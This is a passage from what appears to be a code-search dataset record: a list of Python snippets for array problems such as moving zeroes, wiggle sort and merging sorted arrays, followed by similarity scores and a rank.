0\r\n for i in 
range(len(nums)):\r\n if nums[i]:\r\n nums[pos] = nums[i]\r\n pos += 1\r\n # print(nums[i])\r\n # print(pos)\r\n for i in range(pos, len(nums)):\r\n nums[i] = 0", "def moveZeroes(self, nums: List[int]) -> None:\n\n i = 0\n for cur in range(len(nums)):\n if nums[cur]:\n temp = nums[i], nums[cur]\n nums[cur], nums[i] = temp\n i += 1", "def wiggleSort(self, nums: List[int]) -> None:\n nums.sort()\n for i in range(len(nums) // 2):\n nums.insert(i*2+1, nums.pop())", "def remove_element(self, nums, val):\n\n storeIndex = 0\n\n for num in nums:\n if num != val:\n nums[storeIndex] = num\n storeIndex += 1\n\n return storeIndex", "def moveZeroes(self, nums: List[int]) -> None:\n index = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[index] = nums[i]\n index += 1\n \n for i in range(index, len(nums)):\n nums[i] = 0", "def moveZeroes(self, nums) -> None:\n start, end = 0, 0\n while end < len(nums):\n if nums[end] != 0:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end += 1\n else:\n end += 1", "def moveZeroes(self, nums: List[int]) -> None:\n pos = 0\n for i, x in enumerate(nums):\n if x:\n nums[pos], nums[i] = x, nums[pos]\n pos += 1", "def moveZeroes3(self, nums: List[int]) -> None:\n pos = 0 \n for i in range(len(nums)):\n if nums[i] != 0 :\n nums[i], nums[pos] = nums[pos], nums[i]\n pos += 1", "def moveZeroes(self, nums):\n if len(nums)<2:\n return nums\n left = 0\n right = 1\n while right < len(nums):\n if nums[left] == 0:\n if nums[right] == 0:\n right += 1\n else:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right += 1\n else:\n left += 1\n right += 1\n return nums", "def wiggleSort(self, nums: List[int]) -> None:\n # todo: do this problem again later\n nums.sort(reverse=True)\n l = len(nums) // 2\n nums[::2],nums[1::2] = nums[l:],nums[:l]", "def square_numbers_1(nums):\n result = []\n for i in nums:\n result.append(i*i)\n return result", "def nextPermutation(self, nums: List[int]) -> None:\n if len(nums)==1: return\n \n replace= len(nums)-2\n while nums[replace]>= nums[replace+1] and replace>=0:\n replace-=1\n if replace==-1:\n nums.sort()\n return\n else:\n temp= len(nums)-1 ##temp=2; replace=0\n while nums[temp]<=nums[replace] and temp>replace:\n temp-=1\n # temp-=1\n # print(temp, replace)\n nums[temp], nums[replace]=nums[replace], nums[temp]\n for i in range((len(nums)-replace-1)//2):\n nums[i+ replace+1], nums[-(i+1)] =nums[-(i+1)], nums[i+ replace+1]\n return", "def moveZeroes(self, nums: List[int]) -> None:\n i = 0\n for j in range(len(nums)):\n if nums[j] != 0:\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j += 1", "def remove_duplicates(nums: List[int]) -> int:\n\n if not nums:\n return 0\n\n slow = 0\n for fast in range(1, len(nums)):\n # compare element with a next one in order to find a duplicate in a non-decreasing array\n # if current element is unique,\n # slow runner grows one step and copys the current value\n if nums[slow] != nums[fast]:\n slow += 1\n nums[slow] = nums[fast]\n return slow + 1", "def moveZeroes(self, nums: List[int]) -> None:\n try:\n j = nums.index(0)\n except ValueError:\n return\n nums_len = len(nums)\n i = j + 1\n while i < nums_len and nums[i] == 0:\n i += 1\n\n while i < nums_len:\n nums[j] = nums[i]\n nums[i] = 0\n j += 1\n while i < nums_len and nums[i] == 0:\n i += 1", "def moveZeroes1(self, nums: List[int]) -> None:\n count = 0 \n for i in range(len(nums)-1) :\n i = i - count\n if nums[i] == 0 :\n count += 1\n nums.pop(i)\n \n nums.extend([0]*count)", "def removeDuplicates(self, nums: List[int]) -> 
int:\n lead = 0\n trail = 0\n \n nums_len = len(nums)\n\n while lead < nums_len - 1:\n while nums[lead] <= nums[trail]:\n lead += 1\n if lead >= nums_len:\n break\n else:\n trail += 1\n nums[trail] = nums[lead]\n\n return trail + 1", "def moveZeroes(self, nums: List[int]) -> None:\n l,r=0,len(nums)-1\n while l<r:\n if nums[l]==0:\n nums.append(nums.pop(l))\n r-=1\n continue\n l+=1\n return nums", "def moveZeroes(self, nums: [int]) -> None:\n if len(nums) < 2 :\n return\n point = 0\n for fast_point in range(0,len(nums)):\n if nums[fast_point] != 0:\n nums[point],nums[fast_point] = nums[fast_point],nums[point]\n point += 1\n pass\n pass", "def moveZeroes(self, nums: List[int]) -> None:\n ##brute force\n # counts= nums.count(0)\n # while 0 in nums: nums.remove(0)\n # nums+=[0]*counts\n \n ## two pointer (swapping)\n if not nums: return None\n anchor, explore= 0, 0\n while explore <len(nums):\n if nums[explore]!=0 and explore!=anchor:\n temp= nums[anchor]\n nums[anchor]=nums[explore]\n nums[explore]=temp\n if nums[anchor]!= 0:\n anchor+=1\n explore+=1", "def moveZeroes(self, nums: List[int]) -> None:\n i = j = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[j] , nums[i]= nums[i] , nums[j]\n j += 1", "def moveZeroes(self, nums: List[int]) -> None:\n i = j = 0\n N = len(nums)\n while j < N:\n while j < N and nums[j] == 0:\n j += 1\n if j >= N:\n break\n nums[i] = nums[j]\n i += 1\n j += 1\n while i < N:\n nums[i] = 0\n i += 1", "def moveZeroes(self, nums: List[int]) -> None:\n n = len(nums)\n non0 = 0\n p = 0\n while (p < n):\n if nums[p] != 0:\n nums[p], nums[non0] = nums[non0], nums[p]\n non0 +=1\n \n p +=1", "def moveZeroes(self, nums: [int]) -> None:\n length = len(nums)\n i = 0\n ctr = 0\n while i < length:\n if ctr == length - 1:\n break\n if nums[i] == 0:\n nums.append(0)\n nums.pop(i)\n else:\n i += 1\n ctr += 1", "def moveZeroes(self, nums: List[int]) -> None:\n count = 0\n ans = []\n for num in nums:\n if num != 0:\n ans.append(num)\n else:\n count += 1\n for zero in range(count):\n ans.append(0)\n return ans", "def singleNumber2(self, nums):\n hash_table={}\n \n for i in nums:\n try:\n hash_table.pop(i)\n except:\n hash_table[i] = 1\n \n return hash_table.popitem()[0]", "def moveZeroes(self, nums: List[int]) -> None:\n pos =0\n for i in nums:\n if i==0:\n continue\n else:\n nums[pos]=i\n pos+=1\n nums[pos:] = [0] * (len(nums)-pos)", "def moveZeroes(self, nums: 'List[int]') -> 'None':\n\n i = 0\n len_nums = len(nums)\n while i < len_nums:\n if nums[i] == 0:\n nums.append(nums.pop(i))\n len_nums -= 1\n else:\n i += 1", "def fn(nums):\n ans, vals = [], []\n for i, x in enumerate(nums): \n k = bisect_left(vals, x)\n if k == len(vals): vals.append(x)\n else: vals[k] = x\n ans.append(k)\n return ans", "def moveZeroes(self, nums: List[int]) -> None:\n # 循环记录0元素的个数,并且遇到非0元素时候,将非0元素替换到0元素的位置\n # count 记录0元素的个数, i - count实际上是记录了零元素的位置。\n count = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n elif count > 0:\n nums[i - count], nums[i] = nums[i], 0\n return nums", "def _one_pass(nums):\n pattern = [0, 1, 0, -1]\n return [\n int(str(sum(\n v * pattern[(i // n) % len(pattern)]\n for i, v in enumerate(nums, start=1)\n ))[-1])\n for n in range(1, len(nums) + 1)\n ]", "def moveZeroes(self, nums: List[int]) -> None:\n index = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n index += 1\n else:\n nums[i - index] = nums[i]\n\n index0 = len(nums) - index\n while index0 <= len(nums) -1:\n nums[index0] = 0\n index0 +=1", "def permutation(nums):\n list = []\n temp = []\n 
backtrack(list, temp, nums)\n return list", "def moveZeroes(nums):\n \n zero_count = nums.count(0)\n \n for x in range(zero_count):\n nums.remove(0)\n nums.append(0)", "def moveZeroes(self, nums: List[int]) -> None:\n \n zero_cnt = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n nums.pop(i)\n nums.insert(0, 0)\n zero_cnt += 1\n \n while zero_cnt > 0:\n nums.pop(0)\n nums.append(0)\n zero_cnt -= 1", "def fn(nums):\n if len(nums) == 1: return nums\n return fn(nums[::2]) + fn(nums[1::2])", "def single_number(nums):\n tmp = 0\n for num in nums:\n tmp ^= num\n marker = 1\n while marker & tmp != marker:\n marker <<= 1\n a = 0\n for num in nums:\n if marker & num:\n a ^= num\n b = tmp ^ a\n return [a, b]", "def __init__(self, nums):\n acc = 0\n for i in range(len(self.sumArr)):\n self.sumArr.pop()\n for i in nums:\n acc += i\n self.sumArr.append(acc)\n print self.sumArr", "def moveZeroes(self, nums: List[int]) -> None:\n s = 0\n \n while nums.count(0) > 0:\n nums.remove(0)\n s += 1\n \n for i in range(s):\n nums.append(0)", "def wiggleSort(self, nums: List[int]) -> None:\n newlist=sorted(nums)\n nums[::2]=newlist[:int(len(nums)/2)+len(nums)%2]\n nums[1::2]=newlist[int(len(nums)/2)+len(nums)%2:]", "def moveZeroes(self, nums: List[int]) -> None:\n\n pos = 0\n \n for i in range(len(nums)):\n element = nums[i]\n \n if element != 0:\n nums[pos],nums[i] = nums[i], nums[pos]\n pos +=1", "def sort(self, nums: List[int]) -> None:\n n = len(nums)\n\n # Traverse through th list\n for i in range(n):\n for j in range(n-i-1):\n\n # Swap adjacent elements if they are out of order\n if nums[j] > nums[j+1]:\n nums[j], nums[j+1] = nums[j+1], nums[j]", "def moveZeroes(self, nums: List[int]) -> None:\n N = len(nums)\n l = 0\n r = 0\n while r < N:\n if nums[l] == 0 and nums[r] != 0:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n elif nums[r] == 0:\n r += 1\n else:\n l += 1\n r += 1", "def moveZeroes(self, nums: list) -> None:\n# p, q = 0, 1\n# for p in range(len(nums)):\n# if nums[p] == 0:\n# for q in range(p+1, len(nums)):\n# if nums[q] != 0:\n# nums[p], nums[q] = nums[q], nums[p]\n# break\n q = 0\n for p in range(len(nums)):\n if nums[p] != 0:\n nums[q] = nums[p] #直接把非零数塞到前面,从而避免了又一重循环\n q += 1\n for k in range(q, len(nums)):\n nums[k] = 0\n k += 1", "def wiggleSort(self, nums: List[int]) -> None:\n temp = sorted(nums)\n s, t = (len(nums) + 1) >> 1, len(nums)\n for i in range(len(nums)):\n if i & 1 == 0:\n s -= 1\n nums[i] = temp[s]\n else:\n t -= 1\n nums[i] = temp[t]", "def wiggleSort(self, nums: List[int]) -> None:\n for ind in range(len(nums) - 1):\n\n if ind % 2 == 0:\n if nums[ind] > nums[ind + 1]:\n nums[ind], nums[ind + 1] = nums[ind + 1], nums[ind]\n\n else:\n if nums[ind] < nums[ind + 1]:\n nums[ind], nums[ind + 1] = nums[ind + 1], nums[ind]", "def moveZeroes(self, nums: List[int]) -> None:\n count = 0 # Shift count variable\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n else:\n nums[i-count], nums[i] = nums[i], nums[i-count] # Swap the nubmer and zero\n\n return", "def moveZeroes(self, nums) -> None:\n zero_count = 0\n for index, each_data in enumerate(nums):\n if each_data == 0:\n zero_count += 1\n continue\n nums[index - zero_count] = each_data\n start = len(nums) - zero_count\n while start < len(nums):\n nums[start] = 0\n start += 1", "def merge(self, nums1, m, nums2, n):\n nums1.extend([0]*n)\n j=0\n for i in range(len(nums1)):\n if nums2[j]<nums1[i]:\n nums1.remove(0)\n nums1.insert(i,nums2[j])\n j=j+1", "def reset(self):\n return self.nums", "def moveZeroes(self, nums: 
List[int]) -> None:\n pos=0\n for i in range(len(nums)):\n if(nums[i]!=0):\n nums[pos],nums[i]= nums[i],nums[pos]\n pos+=1", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n for i in range(n):\n nums1[m + i] = nums2[i]\n nums1.sort()", "def moveZeroes(nums):\n for i in nums:\n if (i == 0):\n nums.pop(nums.index(i))\n nums.append(i)", "def merge(self, nums1, m, nums2, n):\n n=len(nums1)\n j=0\n for i in range(n):\n if nums2[j]<nums1[i] and nums2[j]<len(nums2):\n nums1.remove(0)\n nums1.insert(i,nums2[j])\n j=j+1\n if nums1[i]==0 and nums2[j]<len(nums2):\n nums1[i]=nums2[j]", "def sort(self, nums: List[int]) -> None:\n\n # Seperates negative and positive integers\n neg, pos = [], []\n for num in nums:\n if num < 0:\n neg.append(-num)\n else:\n pos.append(num)\n\n # Sorts the negative numbers\n self._sort(neg)\n neg.reverse()\n\n # Sorts the positiv numbers\n self._sort(pos)\n \n # Remerges the sorted subarrays back into the original array.\n i = j = k = 0\n while j < len(neg):\n nums[i] = -neg[j]\n j += 1\n i += 1\n\n while k < len(pos):\n nums[i] = pos[k]\n k += 1\n i += 1", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n j = 0\n i = 0\n while i < m:\n if j >= n:\n break\n if nums1[i] == 0 and i >= m:\n \n nums1[i:] = nums2[j:]\n break\n else:\n if nums1[i] < nums2[j]:\n i+= 1\n else:\n\n nums1[i:] = [nums2[j]]+nums1[i:-1]\n j+=1\n i+=1\n m+=1", "def reset(self) -> List[int]:\n return self.nums", "def moveZeroes2(self, nums) -> None:\n p1, p2 = 0, 0\n N = len(nums)\n\n while p2 < N:\n while p1 < N and nums[p1] != 0:\n p1 += 1\n\n if p2 <= p1:\n p2 = p1 + 1\n\n if p2 >= N:\n break\n\n if nums[p2] != 0:\n nums[p1], nums[p2] = nums[p2], nums[p1]\n p1 += 1\n p2 += 1\n else:\n p2 += 1", "def merge(self, nums1, m, nums2, n):\n nums1.extend([0]*len(nums2))\n j=0\n for i in range(len(nums2)):\n if nums2[i]<nums1[j]:\n nums1.pop()\n print(nums1)\n nums1.insert(j,nums2[i])\n j=j+1", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def __init__(self, nums):\n self.sums,tmp =[],0\n for n in nums:\n tmp +=n\n self.sums.append(tmp)", "def reset(self):\n return self.nums", "def nextPermutation(self, nums) -> None:\n\n def helper(a, i):\n while i > 0:\n for j in range(i - 1, a - 1, - 1):\n if nums[j] < nums[i]:\n nums[j], nums[i] = nums[i], nums[j]\n nums[j + 1:] = reversed(nums[j + 1:])\n return\n elif nums[j] == nums[i]:\n helper(j, i - 1)\n i -= 1\n nums.reverse()\n\n helper(0, len(nums) - 1)", "def square_nums(number_list):", "def fn(i):\n if len(nums) == i: return ans.append(stack.copy())\n fn(i+1)\n stack.append(nums[i])\n fn(i+1)\n stack.pop()", "def nextPermutation(self, nums: List[int]) -> None:\n n = len(nums)\n i = n-2\n while i >= 0 and nums[i] >= nums[i+1]:\n i -= 1\n j = n-1\n while j > i and nums[j] <= nums[i]:\n j -= 1\n\n nums[i], nums[j] = nums[j], nums[i]\n # 当nums已经是最大的,那么 i=j=-1\n nums[i+1:] = sorted(nums[i+1:])", "def merge(self, nums1: [int], m: int, nums2: [int], n: int) -> None:\n for i in range(m, len(nums1)):\n del nums1[m]\n for i in range(n, len(nums2)):\n del nums2[n]\n\n nums1 += nums2\n nums1.sort()", "def smallerNumbersThanCurrent(nums: List[int]) -> List[int]:\n i, count = 0, 0\n arr = []\n for j in range(len(nums)):\n if nums[i] > nums[j]:\n count += 1\n arr.append(count)\n return arr", "def moveZeroes(self, nums) -> None:\n nums.sort(key=lambda x : x != 0)\n print(nums)\n\n point = 0\n for index, value in enumerate(nums):\n if value != 0:\n point = index\n break\n\n nums[point:] = 
list(reversed(nums[point:]))\n print(nums)\n nums.reverse()\n print(nums)", "def moveZeroes(self, nums: List[int]) -> None:\n zeros=0\n for i in range(len(nums)):\n if nums[i]==0:\n zeros+=1\n else:\n nums[i-zeros]=nums[i]\n for i in range(len(nums)-zeros,len(nums)):\n nums[i]=0", "def delete_numbers(n, nums):\n for i in range(len(nums)):\n if nums[i] % n == 0:\n nums[i] = 0", "def moveZeroes(self, nums: List[int]) -> None:\n # Treating the corner case first:\n if len(nums) == 0 or len(nums) == 1:\n return\n # Treating the general cases...\n counter = 0\n for i in range(0, len(nums)):\n if nums[i] == 0:\n counter += 1\n left = 0\n right = 0\n while right < len(nums):\n if nums[left] == 0 and nums[right] == 0:\n right += 1\n elif nums[left] == 0 and nums[right] != 0:\n nums[left] = nums[right]\n left += 1\n right += 1\n elif nums[left] != 0 and nums[right] == 0:\n right += 1\n else:\n nums[left] = nums[right]\n left += 1\n right += 1\n i = -1\n while counter > 0:\n nums[i] = 0\n counter -=1\n i -= 1\n return", "def sort(self, nums: List[int]) -> None:\n n = len(nums)\n for i in range(n):\n\n # Set the lowest to the beginning of the unsorted subarray\n low = i\n for j in range(i+1,n):\n\n # Find the lowest in the unsorted array\n if nums[j] < nums[low]:\n low = j\n \n # Swap the beginning of the unsorted subarray and the lowest.\n # The beginning of the unsorted subarray now becomes the end of the sorted subarray\n nums[i], nums[low] = nums[low], nums[i]", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n nums3 = nums1[:m]\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums3[i] < nums2[j]:\n nums1[k] = nums3[i]\n i += 1\n else:\n nums1[k] = nums2[j]\n j += 1\n k += 1\n \n for v in range(i, m):\n nums1[k] = nums3[v]\n k += 1\n \n for v in range(j, n):\n nums1[k] = nums2[v]\n k += 1", "def moveZeroes(self, nums: List[int]) -> None:\n left = 0\n zero = 0\n right = len(nums) - 1\n while left <= right:\n if nums[left] == 0:\n nums.pop(left)\n nums.append(0)\n right -= 1\n else:\n left += 1", "def nextPermutation(self, nums: list[int]) -> None:\n for i in range(len(nums) - 2, -1, -1):\n if nums[i] < nums[i + 1]: break\n firstGreater = self.findFirstGreater(nums, nums[i], i + 1, len(nums) - 1)\n nums[i], nums[firstGreater] = nums[firstGreater], nums[i]\n nums[i + 1:] = sorted(nums[i + 1:])", "def task4(nums):\n if len(nums) > 1:\n mid = len(nums) // 2\n left = nums[:mid]\n right = nums[mid:]\n\n task4(left)\n task4(right)\n\n i = j = k = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n nums[k] = left[i]\n i += 1\n else:\n nums[k] = right[j]\n j += 1\n k += 1\n\n while i < len(left):\n nums[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n nums[k] = right[j]\n j += 1\n k += 1\n\n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n count=0\n i=0\n while i<len(nums)-count:\n if nums[i]==0: \n count+=1 \n x = i\n y = x+1\n while y <= len(nums) - count:\n nums[x] = nums[y]\n x = y\n y = y+1\n \n nums[len(nums) - count] = 0\n else:\n i = i+1 \n \n print(nums)", "def merge1(self, nums1, m, nums2, n): \n nums1[:m].extend(nums2[:n]) # 此方法改变了nums1的指向,无效\n # extend没改变指向,但是切片改了 \n nums1[:m] + nums2[:n] # 此方法改变了nums1的指向,无效\n # +号改变了指向\n\n nums1.sort()", "def __init__(self, nums):\n d = [0] if nums else []\n for i in xrange(len(nums)):\n d.append(d[i] + nums[i])\n self.d = d", "def single_number(self, nums: List[int]) -> int:\n if not nums:\n return False\n if len(nums) == 1:\n return nums[0]\n\n visited = set()\n\n for i in 
nums:\n if i not in visited:\n visited.add(i)\n else:\n visited.remove(i)\n\n return visited.pop()" ]
[ "0.70469916", "0.67161703", "0.66934896", "0.6586775", "0.6501143", "0.6482345", "0.6442288", "0.6407945", "0.6376896", "0.6372343", "0.63671577", "0.6365932", "0.63512594", "0.6328759", "0.6298402", "0.62855035", "0.62671727", "0.62472045", "0.62221444", "0.6193869", "0.6188269", "0.6184157", "0.61814266", "0.6180073", "0.6167664", "0.6158324", "0.6148441", "0.61476713", "0.613699", "0.6119307", "0.61044604", "0.60979587", "0.6087138", "0.60849226", "0.60818934", "0.6079748", "0.607389", "0.6066264", "0.6053259", "0.6053041", "0.6046262", "0.60457736", "0.60294896", "0.6022872", "0.60060567", "0.59951115", "0.59945714", "0.5977443", "0.596527", "0.5964904", "0.59526557", "0.5948315", "0.5936405", "0.59317774", "0.5928145", "0.592811", "0.59255713", "0.59133506", "0.591277", "0.59082997", "0.59076744", "0.59042895", "0.590009", "0.5897842", "0.58946174", "0.58878344", "0.58807635", "0.587345", "0.5870372", "0.5865296", "0.5863181", "0.58609647", "0.5850446", "0.5843022", "0.5833699", "0.581921", "0.5814978", "0.5814781", "0.5811194", "0.5795042", "0.5785132", "0.5777276", "0.5764196", "0.57611984", "0.5755437", "0.5752843", "0.57499003", "0.5747163", "0.57464033", "0.57400894", "0.5727857", "0.5726958", "0.5722932", "0.57216763", "0.5717795", "0.5711458", "0.57025313", "0.56988806", "0.5677013", "0.5675979", "0.56753594" ]
0.0
-1
check that columns_lst is a subset of self.df.columns.names
def validate_col_lst(self, df, columns_lst):\n    if columns_lst == []:\n        raise ValueError("column_lst is empty")\n    col_set = set(columns_lst)\n    df_col_set = set(list(df))\n    if col_set - df_col_set != set():\n        msg = "col_lst has columns name that does not exists in the DataFrame columns:{}".format(\n            str(col_set - df_col_set))\n        print(msg)\n        raise ValueError(msg)\n    return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def verify_columns_in_dataframe(df, columns):\n\n if not isinstance(columns, list):\n columns = [columns]\n return set(columns).issubset(df.columns)", "def _check_columns(df: pd.DataFrame, names: typing.Sequence[str]) -> None:\n for expected in names:\n if expected not in df.columns:\n raise ValueError(f\"'{expected}' column not found in input\")\n return", "def check_columns_in_dataframe(df: pd.DataFrame, columns: Tuple[str]) -> None:\n\n for col in columns:\n if col not in df.columns:\n raise ValueError(f\"Column {col} is not in the dataframe.\")", "def _validate_columns(self, names):\n if not is_list_like(names):\n raise ValueError(\"Columns should be list-like\")\n\n if len(set(names)) != len(names):\n raise ValueError(\"Duplicate column names\")\n\n if self._data and len(names) != len(self._data[0]):\n raise ValueError(\"Invalid columns length\")", "def checkcolumnstest(chosen_columns, chosen_df):\n if not all([item in chosen_columns for item in chosen_df.columns]):\n raise ValueError('Columns do not match')", "def get_needed_columns(df, list_of_columns):\n return df[list_of_columns]", "def cols_valid(self,\n df: pd.DataFrame,\n req_cols: set) -> bool:\n missing_cols = req_cols.difference(df.columns)\n\n if len(missing_cols) > 0:\n logging.error(f\"{missing_cols} columns required but missing\")\n return False\n\n return True", "def __checkcolumns(self, lista: List[str]) -> True:\r\n\r\n if isinstance(lista, list) is False:\r\n raise TypeError(f\"{lista} has to be a list.\")\r\n if len(lista) != 10:\r\n raise ValueError(f\"{lista} must have 10 columns\")\r\n\r\n errorlista = []\r\n\r\n # Regarding 'self.tiposDisponiveis',\r\n # Layer and Marked happens on the same column.\r\n # if there is 'layer', 'marked' won't show up, and viceversa.\r\n # Therefore 'self.tiposDisponiveis' is a list with 11 elements. 
While 'lista' is a list with 10 elements.\r\n\r\n for _ in lista:\r\n # searching for 'Layer'\r\n if self.tiposDisponiveis[0].lower() == _.lower():\r\n break\r\n else:\r\n # if 'Layer' wasn't found, searching for 'Marked'\r\n for _ in lista:\r\n if self.tiposDisponiveis[1].lower() == _.lower():\r\n break\r\n else:\r\n # If none of the two are present on the line, add to the error list\r\n errorlista.append(\"Layer Or Marked\")\r\n \r\n # repeat the search for all the remaining required values\"\"\"\r\n for _ in range(2, len(self.tiposDisponiveis)-1):\r\n for x in lista:\r\n if x.lower() == self.tiposDisponiveis[_].lower():\r\n break\r\n else:\r\n # Didn't find this column in the list\r\n errorlista.append(f\"{self.tiposDisponiveis[_]}\")\r\n\r\n # Raising the errors, if any occurred.\r\n if len(errorlista) > 0:\r\n raise ValueError(f\"{errorlista} <- These columns are missing from format.\")\r\n\r\n # Last column has to be 'Text'\r\n if lista[9].lower() != self.tiposDisponiveis[10].lower():\r\n raise ValueError(f\"{lista[9]} last element has to be 'Text'.\")\r\n \r\n return True", "def _check_columns_with_table(table: Table, columns: Sequence[str]) -> Optional[bool]:\n for column in columns:\n if column not in table.c.keys():\n raise TypeError(f\"Specified column {column} did not exist on table {table}\")\n return True", "def __column_intersect(df, list_):\n return set(list_).intersection(set(df.columns.tolist()))", "def _dataframe_column_check(df: DataFrame, compulsory_columns: Sequence) -> None:\n if not set(compulsory_columns).issubset(df.columns):\n diff = set(compulsory_columns).difference(df.columns)\n msg = (\n \"The following compulsory column(s) are missing from the \"\n f\"DataFrame: {diff}\"\n )\n raise ValueError(msg)", "def check_col(self):\n return (set(map(lambda x: x.lower(),\n self.config['dtypes'])) -\n set(self.metadata.name.values))", "def _check_columns(\n schema_errors: set[str],\n stored: Mapping,\n expected: Mapping,\n columns: Iterable[str],\n table_name: str,\n supports: str,\n) -> None:\n for column in columns:\n if stored[column] == expected[column]:\n continue\n schema_errors.add(f\"{table_name}.{supports}\")\n _LOGGER.error(\n \"Column %s in database table %s does not support %s (stored=%s != expected=%s)\",\n column,\n table_name,\n supports,\n stored[column],\n expected[column],\n )", "def _check_missing_columns(self, df: pd.DataFrame) -> None:\n if any([c not in df.columns for c in REQUIRED_COLUMNS]):\n raise ValueError(\"Missing columns in dataset.\"\n f\"Columns: {df.columns}\"\n f\"Required: {REQUIRED_COLUMNS}\")", "def check_base_fields(df,base_fields):\n emp_list = []\n for item in base_fields:\n if item not in list(df.columns):\n emp_list.append(item)\n\n return emp_list", "def _check_headers(cursor, headers):\n all_columns = set(chain.from_iterable(_columns(cursor, table) for table in DATA_TABLES))\n for header in headers:\n if header not in all_columns:\n raise ValueError('column {} not recognized'.format(header))", "def has_columns(df, columns):\n result = True\n for column in columns:\n if column not in df.columns:\n print(\"Missing column: {} in DataFrame\".format(column))\n result = False\n\n return result", "def get_columns_for(self, column_names, row, dbrow=None):\n if dbrow:\n candidates = filter(lambda col: col not in self.insert_only_fields, column_names)\n else:\n candidates = column_names\n\n return set(candidates).intersection(row._fields)", "def _assert_columns_exist(self, columns):\n if not nonstringiter(columns):\n columns = 
(columns,)\n self_cols = self.columns()\n is_missing = lambda col: col not in self_cols\n missing = [c for c in columns if is_missing(c)]\n if missing:\n missing = ', '.join(repr(x) for x in missing)\n msg = '{0} not in {1}'.format(missing, self.__repr__())\n raise LookupError(msg)", "def check_dataframe_columns(df):\r\n if len(set(df.columns).intersection(\r\n set([constants.CASE_CONCEPT_NAME, xes_constants.DEFAULT_NAME_KEY,\r\n xes_constants.DEFAULT_TIMESTAMP_KEY]))) < 3:\r\n raise Exception(\r\n \"please format your dataframe accordingly! df = pm4py.format_dataframe(df, case_id='<name of the case ID column>', activity_key='<name of the activity column>', timestamp_key='<name of the timestamp column>')\")", "def verify_columns_in_dataset(self, columns):\n all_cols = self.train.columns\n for col in columns:\n if not col in all_cols:\n raise KeyError(\"column '%s' not in dataset\" % col)", "def check_column(self, columns):\n for i in columns:\n if i.name == self.name:\n raise ColumnNameAlreadyInTableException(f'Column \"{self.name}\" is already in the table!')\n return True", "def _validate_optional_columns(data, optional_columns: Iterable[str]) -> List[str]:\n return [col for col in optional_columns if col in data.columns]", "def is_cols_valid(bd):\n for col in cols:\n seen = []\n for num in nums:\n if bd[col[num]] == \" \":\n continue\n elif bd[col[num]] not in seen:\n seen += [bd[col[num]]]\n else:\n return False\n else:\n continue\n return True", "def check_ingress_required_columns(self, col_names):\n if not set(col_names).issuperset(REQUIRED_COLUMNS):\n if not set(col_names).issuperset(REQUIRED_ALT_COLUMNS):\n missing_columns = [x for x in REQUIRED_ALT_COLUMNS if x not in col_names]\n return missing_columns\n return None", "def verify_columns_in_dataset(self, columns):\n all_cols = self.dataset.columns\n for col in columns:\n if not col in all_cols:\n raise KeyError(\"column '%s' not in dataset\" % col)", "def mpl_args_to_meta_cols(df, **kwargs):\n cols = set()\n for arg, value in kwargs.items():\n if is_str(value) and value in df.meta.columns:\n cols.add(value)\n return list(cols)", "def _selected_columns(self):\n selected_columns = set()\n for feature in self.features:\n columns = feature[0]\n if isinstance(columns, list):\n selected_columns = selected_columns.union(set(columns))\n else:\n selected_columns.add(columns)\n return selected_columns", "def get_columns(hdu, columns):\n if columns is not None:\n columns = columns.split(',')\n columns = [c.lower() for c in columns]\n else:\n columns = hdu.get_colnames()\n\n return columns", "def test_columns_str_error(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=None)\n\n x.columns = \"a\"\n\n with pytest.raises(ValueError):\n\n x.columns_check(X=df)", "def column_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"column_names\")", "def check_null_columns(spark, df, cols):\n null_cols_list = []\n # this assumes the col list matches the original schema\n # df = df.toDF(*cols)\n try:\n df = df.select(*cols)\n col_null_count = df.select([F.count(F.when(F.isnan(col) | F.col(col).isNull(), col)).alias(col) for col in cols]).toPandas().to_dict()\n null_cols_list = [k for k, v in col_null_count.items() if v[0] > 0]\n except Exception as e:\n logger.error('Probably and invalid column(s) was passed...')\n return ['failed']\n return null_cols_list", "def get_all_columns(self):\n df = self.get_prep_data()\n col = [c for c in df.columns if c not in ['target', 'idd', 'ft_data_dt']]\n return 
col", "def areAllFieldsIncluded(ldata, columns):\n\treturn list(range(len(ldata))) == columns", "def validate_columns(self, fieldnames, dao):\n unstored_columns = ['blank']\n expected_columns = dao.model_type.__table__.columns.keys() + unstored_columns\n for column_name in fieldnames:\n if column_name not in expected_columns:\n raise AttributeError(f\"{self.file_path}: {column_name} column mismatch for \"\n f\"expected file type: {self.file_type.name}\")", "def columns(self):\n return set(self.native_schema)", "def check_cols_methane(name):\n return True if name in ['SampleDay', 'SampleHour', 'Decimal Year',\n 'Peak Area 1', 'Peak Area 2', 'Run median', 'Daily Median'] else False", "def get_all_columns_name(input_glob):\n reader = tf.python_io.TableReader(input_glob,\n selected_cols=\"\",\n excluded_cols=\"\",\n slice_id=0,\n slice_count=1,\n num_threads=0,\n capacity=0)\n schemas = reader.get_schema()\n return set([col_name for col_name, _, _ in schemas])", "def set_check_columns(self):\n # changed to: get column family from indexer\n extr_prefix_base_column_name = self.indexer.extrcf + \":\" + self.extr_prefix\n extr_check_column = extr_prefix_base_column_name + \"_processed\"\n # Need to be build from extraction type and extraction input + \"_batchid\"\n self.batch_check_column = extr_prefix_base_column_name + \"_updateid\"\n self.check_columns = [extr_check_column, self.batch_check_column]\n #print(self.check_columns)", "def 